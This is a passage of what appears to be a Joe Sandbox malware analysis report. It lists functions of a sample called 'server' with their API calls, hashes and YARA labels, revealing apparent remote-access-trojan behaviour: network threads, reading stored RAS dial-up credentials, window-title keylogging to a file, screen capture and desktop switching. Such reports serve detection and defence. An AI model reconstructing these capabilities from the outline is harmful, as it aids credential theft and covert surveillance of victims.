                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                • Instruction ID: 85862d7f0f71f0c49f886932ab5ba76a0be675f07226ac381a57201f8fc0328c
                                • Opcode Fuzzy Hash: b0f98d7cc70be7034cfa90e989c04db07f7eb8121ae3485462dc02540b3a068e
                                • Instruction Fuzzy Hash: D021C7727407155BE328DB349C85B1A76E2FBC4760F65462EFA56A72D0CFB4EC048618
                                Function 10004F00 Relevance: 9.1, APIs: 6, Instructions: 85threadnetworkCOMMON
                                Download Yara Rule
                                APIs
                                • inet_addr.WS2_32(?), ref: 10004F08
                                • gethostbyname.WS2_32(?), ref: 10004F14
                                • inet_ntoa.WS2_32(?), ref: 10004F3E
                                • CreateThread.KERNEL32(00000000,00000000,Function_000040F0,00000000,00000000,00000000), ref: 10004FAC
                                • CloseHandle.KERNEL32(00000000), ref: 10004FAF
                                • CreateThread.KERNEL32(00000000,00000000,Function_00004DC0,00000000,00000000,00000000), ref: 10004FD8
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$CloseHandlegethostbynameinet_addrinet_ntoa
                                • String ID:
                                • API String ID: 772126777-0
                                • Opcode ID: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                • Instruction ID: 074d757184539b64c9d175ae26cd748b0207da95c97c991421b52f25c974b03f
                                • Opcode Fuzzy Hash: 6963211a604a5b15fbd72f10532032c652b07b21011d2a556fd3fd40579641c8
                                • Instruction Fuzzy Hash: FB2106723043155BE328DB389C85B2A76E2FBC4760F66462DFA52A72D0CEF4EC04C618
                                Function 10002C30 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                Download Yara Rule
                                APIs
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C48
                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 10002C51
                                • ??2@YAPAXI@Z.MSVCRT(000003E8), ref: 10002C78
                                • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8), ref: 10002C82
                                • ??2@YAPAXI@Z.MSVCRT(000003E8,00000020,000003E8), ref: 10002C8D
                                • ??2@YAPAXI@Z.MSVCRT(00000020,000003E8,00000020,000003E8), ref: 10002C97
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CreateEvent
                                • String ID:
                                • API String ID: 747899935-0
                                • Opcode ID: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                • Instruction ID: a50fb07bf8c1123475231c099c298c4878f8277ca68681ab5e841357f648eb1a
                                • Opcode Fuzzy Hash: 4a89f466c376dbb1b068e75c919d489d1edda17e83e2f925ebc477eae31192d0
                                • Instruction Fuzzy Hash: 04215EB0900B449FD324CF6AC884557FBF8FF48348750892EE1898BB11E7B6E845CB54
                                Function 00402DD4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                Download Yara Rule
                                APIs
                                • GetVersionExA.KERNEL32 ref: 00402DF3
                                • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00402E28
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00402E88
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: EnvironmentFileModuleNameVariableVersion
                                • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                • API String ID: 1385375860-4131005785
                                • Opcode ID: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                • Instruction ID: 6320224d0c2d352184b776b6ceda42ea704a1604693acbb24f6c53f50b478bf9
                                • Opcode Fuzzy Hash: d32aba8153413fb79f22db8816aa953c0611f4f7a567bdac4acef65ff769318a
                                • Instruction Fuzzy Hash: D231577188025869EB30D630EE49BDB37689B02708F2400FBD245F52C2E3BD8E998B59
                                Function 100073D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 69COMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 1000743C
                                  • Part of subcall function 100071B0: LsaOpenPolicy.ADVAPI32(00000000,?,00000004,?), ref: 100071D2
                                • LsaFreeMemory.ADVAPI32(?), ref: 1000746A
                                • LsaFreeMemory.ADVAPI32(?), ref: 10007494
                                  • Part of subcall function 10007240: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000,?,00000000), ref: 10007279
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: FreeMemory$ByteCharMultiOpenPolicyWidewsprintf
                                • String ID: L$_RasDefaultCredentials#0$RasDialParams!%s#0
                                • API String ID: 3354934605-1591505386
                                • Opcode ID: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                • Instruction ID: 47a45ef77663ef483bee348490e5c8beabf349d216bd41400619d6b49833efe8
                                • Opcode Fuzzy Hash: 069507318d07fdd3591eeedcd7f3e9026eb01116497707671abf5df464a27a46
                                • Instruction Fuzzy Hash: 662180799083119BE318DF68C89096BB3E9FBC8740F00892DF98993340D678E988CBD1
                                Function 10009020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileA.KERNEL32(00000021,40000000,00000002,00000000,00000003,00000080,00000000,?,00000001), ref: 1000904C
                                • SetFilePointer.KERNEL32(00000000,?,?,00000000,?,00000001), ref: 1000905D
                                • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000001), ref: 10009077
                                • CloseHandle.KERNEL32(00000000,?,00000001), ref: 1000907E
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseCreateHandlePointerWrite
                                • String ID: p
                                • API String ID: 3604237281-2181537457
                                • Opcode ID: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                • Instruction ID: e36ba735aa5967a60d40e1ff6ea43c2d8375e51feaec2a2a75f8885a5be44a60
                                • Opcode Fuzzy Hash: bcc1cd4cbb62ecbc575abc8427f350afb3af9461df4ed93e73f2b520365a0fe5
                                • Instruction Fuzzy Hash: CE11CE71244312ABE300DF54CC85F6BB7E9EFD9714F040A1DF6449B2D0E7B4A9098BA2
                                Function 1000D4A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 1000D440: RtlEnterCriticalSection.NTDLL(?), ref: 1000D448
                                  • Part of subcall function 1000D440: RtlLeaveCriticalSection.NTDLL(?), ref: 1000D462
                                • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 1000D4C6
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 1000D4D4
                                • FreeLibrary.KERNEL32(00000000), ref: 1000D4E6
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalLibrarySection$AddressEnterFreeLeaveLoadProc
                                • String ID: closesocket$ws2_32.dll
                                • API String ID: 2819327233-181964208
                                • Opcode ID: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                • Instruction ID: 00068fa8fe7e3d5c1250a0fa65b0051220447006da9e6c79012b2ada544fa8ed
                                • Opcode Fuzzy Hash: fa73705bdcf92b9203618bcc10ca7097f6834da9e5e7f852be07f6072b9ccad8
                                • Instruction Fuzzy Hash: 4FF0EC36004B21ABE210EF389C85D9F7798EFC9762F004719FB4096240CB74E905C7B6
                                Function 00403A7D Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                Download Yara Rule
                                APIs
                                • GetStartupInfoA.KERNEL32(?), ref: 00403AD6
                                • GetFileType.KERNEL32(00000800), ref: 00403B7C
                                • GetStdHandle.KERNEL32(-000000F6), ref: 00403BD5
                                • GetFileType.KERNEL32(00000000), ref: 00403BE3
                                • SetHandleCount.KERNEL32 ref: 00403C1A
                                Memory Dump Source
                                • Source File: 00000003.00000002.3257874536.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000003.00000002.3254439993.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3264508159.0000000000406000.00000002.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3268423591.0000000000407000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3276394847.000000000042E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                • Associated: 00000003.00000002.3281553731.0000000000430000.00000002.00000001.01000000.00000006.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_400000_server.jbxd
                                Similarity
                                • API ID: FileHandleType$CountInfoStartup
                                • String ID:
                                • API String ID: 1710529072-0
                                • Opcode ID: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                • Instruction ID: 31f96ad768a7b34329c178f01d9d2c09c0530c6e7952056691baff74689cfdd4
                                • Opcode Fuzzy Hash: 77ec292723b799dc4d9b58e1807d0efb76a35c9d561ca0d753548a00766590b6
                                • Instruction Fuzzy Hash: 805114316046404BD7208F2CCC447667FB8FB1172AF55463AE8A6EB2E2D77CE949C719
                                Function 1000F260 Relevance: 7.6, APIs: 5, Instructions: 95synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F283
                                • CloseHandle.KERNEL32(?,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F28D
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2B1
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F2E2
                                  • Part of subcall function 1000FB90: LoadCursorA.USER32(00000000,00000000), ref: 1000FC53
                                • ??2@YAPAXI@Z.MSVCRT(00000110,?,?,1006A0F1,000000FF,1000F405,?,?,?,?,?,?,1006A100,000000FF), ref: 1000F309
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: ??2@$CloseCursorHandleLoadObjectSingleWait
                                • String ID:
                                • API String ID: 1916621575-0
                                • Opcode ID: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                • Instruction ID: b70eef93bc3be5527f367b70327705cb0ffa67acdb31b1760f540c4c307e6a46
                                • Opcode Fuzzy Hash: 1eb705cd905c0f146ef5bf02cb5afe729e58b6fb5cf2b9490db994987b313b70
                                • Instruction Fuzzy Hash: FC31C1B0B04741ABE320DF348C52B5BBAE1EB45750F000A2CF2969BAD1DBB1E5488792
                                Function 100103D0 Relevance: 7.6, APIs: 5, Instructions: 91windowCOMMON
                                Download Yara Rule
                                APIs
                                • CreateDIBSection.GDI32(10010206,?,00000000,10010206,00000000,00000000), ref: 1001042E
                                • SelectObject.GDI32(?,00000000), ref: 1001043D
                                • BitBlt.GDI32(?,?,?,?,?,?,?,?,?), ref: 1001045A
                                • BitBlt.GDI32(?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1001047A
                                • DeleteObject.GDI32(?), ref: 100104A2
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Object$CreateDeleteSectionSelect
                                • String ID:
                                • API String ID: 3188413882-0
                                • Opcode ID: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                • Instruction ID: 86756e093dbd4203ef58af1e2a4b75b8c92c1fe1a1b021b6ca6aa4606f99d77a
                                • Opcode Fuzzy Hash: 6914c3d10498faa931e45aa64833eb2ce3589ba839e4f727551740e0ed738175
                                • Instruction Fuzzy Hash: 7231D5B6200705AFE214CF59CC85E27F7AAFB88710F108A1DFA5587791C7B1F9408BA0
                                Function 100098F0 Relevance: 7.6, APIs: 5, Instructions: 71stringtimeCOMMON
                                Download Yara Rule
                                APIs
                                • GetForegroundWindow.USER32(?), ref: 10009906
                                • GetWindowTextA.USER32(00000000,1007E2FC,00000400), ref: 1000991C
                                • lstrlen.KERNEL32(1007E2FC), ref: 10009951
                                • GetLocalTime.KERNEL32(?), ref: 10009964
                                • wsprintfA.USER32 ref: 100099B9
                                  • Part of subcall function 100097A0: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 100097B4
                                  • Part of subcall function 100097A0: CreateFileA.KERNEL32(?,40000000,00000002,00000000,00000004,00000080,00000000), ref: 1000986B
                                  • Part of subcall function 100097A0: GetFileSize.KERNEL32(00000000,00000000), ref: 1000987E
                                  • Part of subcall function 100097A0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 10009892
                                  • Part of subcall function 100097A0: lstrlen.KERNEL32(?), ref: 100098A0
                                  • Part of subcall function 100097A0: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 100098A9
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$Windowlstrlen$??2@CreateDirectoryForegroundLocalPointerSizeSystemTextTimewsprintf
                                • String ID:
                                • API String ID: 1247169605-0
                                • Opcode ID: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                • Instruction ID: 4f7ab4636ff0803a810951040c387652c581d68020769500fe1f8d2c0b4bc754
                                • Opcode Fuzzy Hash: 1df0067ec9095a37b7ec69bcb802230090b704360ccb88951738f67c71e14fa4
                                • Instruction Fuzzy Hash: FB21A1B12052636BE304CB18CC95A6776AAEF8C300F408A38F281D76A1D67C9D498659
                                Function 100113A0 Relevance: 7.6, APIs: 5, Instructions: 67sleepmemoryfileCOMMON
                                Download Yara Rule
                                APIs
                                • Sleep.KERNEL32(00000064), ref: 100113C1
                                • LocalAlloc.KERNEL32(00000040,?), ref: 10011403
                                • ReadFile.KERNEL32(?,00000000,?,00000000,00000000), ref: 1001141C
                                • Sleep.KERNEL32(00000001,00000000,00000000), ref: 10011431
                                • LocalFree.KERNEL32(00000000), ref: 10011434
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: LocalSleep$AllocFileFreeRead
                                • String ID:
                                • API String ID: 175009107-0
                                • Opcode ID: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                • Instruction ID: 73315cb63eaab40e7695a76611e533bd3f9cb332f13e7bafef01b234fadabf49
                                • Opcode Fuzzy Hash: bf2ef6bc8ebea7897a9c7f3b59668ea674f0e4ecd9d9d3187eed418d19d2a9dc
                                • Instruction Fuzzy Hash: 42211D71204352ABE304DF65CC85FAB77EDEB88B00F00491CB755EA284D7B0E9488B76
                                Function 10012A50 Relevance: 7.5, APIs: 5, Instructions: 37threadCOMMON
                                Download Yara Rule
                                APIs
                                • GetCurrentThreadId.KERNEL32 ref: 10012A58
                                • GetThreadDesktop.USER32(00000000), ref: 10012A5F
                                • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 10012A80
                                • SetThreadDesktop.USER32(?), ref: 10012A94
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Thread$Desktop$CurrentInformationObjectUser
                                • String ID:
                                • API String ID: 3041254040-0
                                • Opcode ID: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                • Instruction ID: b6529946467a443cafd68ee4fafc1a010a5a5dac77649d55f7b29be3a82e6d96
                                • Opcode Fuzzy Hash: 556f9f34ce626c626d025b5ad994241f14c7a72d7fb554adc5a2ad2683bfa424
                                • Instruction Fuzzy Hash: A0F059B12003606BF3109729DCC9BEF3769EF84725F804035F640C2050FBF889C581A2
                                Function 1000A7C0 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 33sleepstringCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleeplstrlenwsprintf
                                • String ID: Host$SYSTEM\CurrentControlSet\Services\%s
                                • API String ID: 1736695411-3973614608
                                • Opcode ID: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                • Instruction ID: 42bb8f1d3cbc34b1093e393aafb0570189901e8aeaae8089c09646219bf79e8e
                                • Opcode Fuzzy Hash: 8131760f708bed2bd4ce06e64e052545d9e5e77d913a46266ffcad926d35ad94
                                • Instruction Fuzzy Hash: A9F0E2B5500321BFF320AB54DC49FEB3BA9DFC4308F004818FB48A6191D2B56989C6E7
                                Function 10003DB0 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                Download Yara Rule
                                APIs
                                • setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10003DDA
                                • CancelIo.KERNEL32(?), ref: 10003DE7
                                • InterlockedExchange.KERNEL32(?,00000000), ref: 10003DF6
                                • closesocket.WS2_32(?), ref: 10003E03
                                • SetEvent.KERNEL32(?), ref: 10003E10
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.000000001007A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3375866046.00000000100F8000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3378732421.00000000100FA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_10000000_server.jbxd
                                Yara matches
                                Similarity
                                • API ID: CancelEventExchangeInterlockedclosesocketsetsockopt
                                • String ID:
                                • API String ID: 1486965892-0
                                • Opcode ID: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                • Instruction ID: 5bdee382e423177a237ef2210d66a0bf4d0f96213256af2b3b43e88352a19dbf
                                • Opcode Fuzzy Hash: dd51bebf1240dcd95c78d2e4838092bba280de6a908707723a9b60bc76aba793
                                • Instruction Fuzzy Hash: 86F01275204751BFE7248B70CC88F9777A9AF49711F104A1DF69A462D0CFB0A8489756
                                Function 10068D40 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 130comCOMMON
                                Download Yara Rule
                                APIs
                                • CoCreateInstance.OLE32(10077218,00000000,00000001,10077188,?), ref: 10068D70
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.3369989178.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                • Associated: 00000003.00000002.3368736444.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000003.00000002.3373735848.000000001006E000.00000002.00001000.00020000.00000000.sdmpDownload File
